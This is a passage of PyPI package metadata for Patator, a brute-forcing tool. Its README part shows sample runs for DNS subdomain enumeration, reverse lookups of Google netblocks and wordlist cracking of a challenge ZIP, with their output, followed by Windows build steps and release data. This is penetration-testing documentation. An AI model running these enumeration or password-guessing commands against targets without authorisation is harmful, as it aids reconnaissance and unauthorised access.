10 itesec.hsc.fr.\n mail.hsc.fr. IN CNAME itesec.hsc.fr.\n mailhost.hsc.fr. IN A 192.70.106.33\n mailhost.hsc.fr. IN AAAA 2001:7a8:1155:2::abcd\n news.hsc.fr. IN CNAME itesec.hsc.fr.\n wap.hsc.fr. IN A 192.70.106.33\n webmail.hsc.fr. IN A 192.70.106.95\n www.hsc.fr. IN A 217.174.211.25\nHostmap ------------------------------------------\n mailhost.hsc.fr 2001:7a8:1155:2::abcd\n mailhost.hsc.fr 192.70.106.33\n wap.hsc.fr 192.70.106.33\n itesec.hsc.fr 192.70.106.33\n extranet.hsc.fr\n mail.hsc.fr\n news.hsc.fr\n webmail.hsc.fr 192.70.106.95\n gl.hsc.fr 192.70.106.103\n www.hsc.fr 217.174.211.25\nDomains ------------------------------------------\n hsc.fr 10\nNetworks -----------------------------------------\n 2001:7a8:1155:2::abcd\n 192.70.106.x\n 217.174.211.25\n03:18:53 patator INFO - Hits/Done/Skip/Fail/Size: 11/1000/0/0/1000, Avg: 133 r/s, Time: 0h 0m 7s\n```\n\nAlso notice that `test.hsc.fr.` is the start of a new zone because we got NOERROR and no IP address.\n\n* DNS : Reverse lookup two netblocks owned by Google\n\n```\n$ dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239-\n03:24:22 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:24 PMT\n03:24:22 patator INFO -\n03:24:22 patator INFO - code size | candidate | num | mesg\n03:24:22 patator INFO - ----------------------------------------------------------------------\n03:24:22 patator INFO - 0 46 | 216.239.32.10 | 11 | NOERROR [216.239.32.10 IN PTR ns1.google.com.]\n03:24:22 patator INFO - 0 45 | 216.239.32.11 | 12 | NOERROR [216.239.32.11 IN PTR ns.google.com.]\n03:24:22 patator INFO - 0 48 | 216.239.32.15 | 16 | NOERROR [216.239.32.15 IN PTR time1.google.com.]\n03:24:23 patator INFO - 0 47 | 216.239.33.5 | 262 | NOERROR [216.239.33.5 IN PTR proxy.google.com.]\n03:24:23 patator INFO - 0 47 | 216.239.33.12 | 269 | NOERROR [216.239.33.12 IN PTR dns1.google.com.]\n03:24:23 patator INFO - 0 51 | 216.239.33.22 | 279 | NOERROR [216.239.33.22 IN PTR transfer.google.com.]\n03:24:23 patator INFO - 0 50 | 216.239.33.20 | 277 | NOERROR [216.239.33.20 IN PTR esc-out.google.com.]\n03:24:23 patator INFO - 0 46 | 216.239.34.10 | 523 | NOERROR [216.239.34.10 IN PTR ns2.google.com.]\n03:24:23 patator INFO - 0 48 | 216.239.34.15 | 528 | NOERROR [216.239.34.15 IN PTR time2.google.com.]\n^C\nRecords ------------------------------------------\n 216.239.32.10 IN PTR ns1.google.com.\n 216.239.32.11 IN PTR ns.google.com.\n 216.239.32.15 IN PTR time1.google.com.\n 216.239.33.12 IN PTR dns1.google.com.\n 216.239.33.20 IN PTR esc-out.google.com.\n 216.239.33.22 IN PTR transfer.google.com.\n 216.239.33.5 IN PTR proxy.google.com.\n 216.239.34.10 IN PTR ns2.google.com.\n 216.239.34.15 IN PTR time2.google.com.\nHostmap ------------------------------------------\n ns1.google.com 216.239.32.10\n ns.google.com 216.239.32.11\n time1.google.com 216.239.32.15\n proxy.google.com 216.239.33.5\n dns1.google.com 216.239.33.12\n esc-out.google.com 216.239.33.20\n transfer.google.com 216.239.33.22\n ns2.google.com 216.239.34.10\n time2.google.com 216.239.34.15\nDomains ------------------------------------------\n google.com 9\nNetworks -----------------------------------------\n 216.239.32.x\n 216.239.33.x\n 216.239.34.x\n03:24:29 patator INFO - Hits/Done/Skip/Fail/Size: 9/872/0/0/4352, Avg: 115 r/s, Time: 0h 0m 7s\n03:24:29 patator INFO - To resume execution, pass --resume 91,75,93,73,84,95,94,95,83,89\n```\n\n* ZIP : Crack a password-protected ZIP file (older pkzip encryption used not to be supported in JtR)\n\n```\n$ unzip_pass zipfile=challenge1.zip password=FILE0 0=rockyou.dic -x ignore:code!=0\n10:54:29 patator INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 10:54:29 PMT\n10:54:29 patator INFO -\n10:54:29 patator INFO - code size | candidate | num | mesg\n10:54:29 patator INFO - ----------------------------------------------------------------------\n10:54:30 patator INFO - 0 82 | love | 387 | 0 [82] No errors detected in compressed data of challenge1.zip.\n^C\n10:54:31 patator INFO - Hits/Done/Skip/Fail/Size: 1/1589/0/0/5000, Avg: 699 r/s, Time: 0h 0m 2s\n10:54:31 patator INFO - To resume execution, pass --resume 166,164,165,166,155,158,148,158,155,154\n```\n\n## PyInstaller\n### Bundling on Windows 5.2.3790 x86\n\nInstall `python-2.7.9.msi` from [Python](https://www.python.org/downloads/windows/).\nInstall `pywin32-219.win32-py2.7.exe` from [PyWin32](http://sourceforge.net/projects/pywin32/files/pywin32/).\nInstall `vcredist_x86.exe` from [Microsoft](http://www.microsoft.com/en-us/download/confirmation.aspx?id=29).\nInstall `Git-1.9.5.exe` from [Git](http://git-scm.com/download/win) (and select \"Use Git from Windows Command Prompt\" during install).\nAdd `c:\\Python27;c:\\Python27\\Scripts` to your `PATH`.\n\n```\npip install pycrypto pyopenssl\npip install impacket\npip install paramiko\npip install IPy\npip install dnspython\npip install pysnmp\n\ncd c:\\\ngit clone https://github.com/lanjelot/patator\ngit clone https://github.com/pyinstaller/pyinstaller\ncd pyinstaller\ngit checkout a2b0617251ebe70412f6e3573f00a49ce08b7b32 # fixes this issue: https://groups.google.com/forum/#!topic/pyinstaller/6xD75_w4F-c\npython pyinstaller.py --clean --onefile c:\\patator\\patator.py\npatator\\dist\\patator.exe -h\n```\n\nThe resulting stand-alone `patator.exe` executable was confirmed to run successfully on Windows 2003 (5.2.3790), Windows 7 (6.1.7600), Windows 2008 R2 SP1 (6.1.7601) and Windows 2012 R2 (6.3.9600), and is likely to work fine on other Windows versions.\n\nRefer to [#50](https://github.com/lanjelot/patator/issues/50) for more info.\n",
"bugtrack_url": null,
"license": null,
"summary": "Multi-purpose brute-forcer",
"version": "1.1.0",
"project_urls": {
"Homepage": "https://github.com/lanjelot/patator",
"Issues": "https://github.com/lanjelot/patator/issues"
},
"split_keywords": [
"brute force",
" password attack",
" pentest"
],
"urls": [
{
"comment_text": null,
"digests": {
"blake2b_256": "2ff8c7e7b0a1a919cedd4ea1ffcce04004c1b6b53a7283b8c4cc4d58f20b81ab",
"md5": "19322fffa35b2d7edc58fe0461042224",
"sha256": "764df0f574a27227d5ffa8b4cf9b44656dff01e0986e08dc7ffe5eb549a11a04"
},
"downloads": -1,
"filename": "patator-1.1.0-py3-none-any.whl",
"has_sig": false,
"md5_digest": "19322fffa35b2d7edc58fe0461042224",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": ">=3.13",
"size": 51798,
"upload_time": "2025-02-17T02:15:29",
"upload_time_iso_8601": "2025-02-17T02:15:29.036659Z",
"url": "https://files.pythonhosted.org/packages/2f/f8/c7e7b0a1a919cedd4ea1ffcce04004c1b6b53a7283b8c4cc4d58f20b81ab/patator-1.1.0-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": null,
"digests": {
"blake2b_256": "37e485e6c8750c5f1928050e5aa029b37986a63e1f0ba13bbede46b7848055ea",
"md5": "5ed9d5a17b48cc5cba8bf3aa3d4b177c",
"sha256": "06ea41fece07364e835316eb1c1fe89ea792ee42f45ac18f6768ea2948fb0c9c"
},
"downloads": -1,
"filename": "patator-1.1.0.tar.gz",
"has_sig": false,
"md5_digest": "5ed9d5a17b48cc5cba8bf3aa3d4b177c",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3.13",
"size": 57303,
"upload_time": "2025-02-17T02:15:30",
"upload_time_iso_8601": "2025-02-17T02:15:30.833194Z",
"url": "https://files.pythonhosted.org/packages/37/e4/85e6c8750c5f1928050e5aa029b37986a63e1f0ba13bbede46b7848055ea/patator-1.1.0.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2025-02-17 02:15:30",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "lanjelot",
"github_project": "patator",
"travis_ci": false,
"coveralls": false,
"github_actions": false,
"requirements": [
{
"name": "paramiko",
"specs": [
[
"==",
"3.5.1"
]
]
},
{
"name": "pycurl",
"specs": [
[
"==",
"7.45.4"
]
]
},
{
"name": "ajpy",
"specs": [
[
"==",
"0.0.5"
]
]
},
{
"name": "impacket",
"specs": [
[
"==",
"0.12.0"
]
]
},
{
"name": "cx_Oracle",
"specs": [
[
"==",
"8.3.0"
]
]
},
{
"name": "mysqlclient",
"specs": [
[
"==",
"2.2.7"
]
]
},
{
"name": "psycopg2-binary",
"specs": [
[
"==",
"2.9.10"
]
]
},
{
"name": "pycryptodomex",
"specs": [
[
"==",
"3.21.0"
]
]
},
{
"name": "dnspython",
"specs": [
[
"==",
"2.7.0"
]
]
},
{
"name": "IPy",
"specs": [
[
"==",
"1.1"
]
]
},
{
"name": "pysnmp",
"specs": [
[
"==",
"7.1.16"
]
]
},
{
"name": "telnetlib-313-and-up",
"specs": [
[
"==",
"3.13.1"
]
]
}
],
"lcname": "patator"
}
JSON
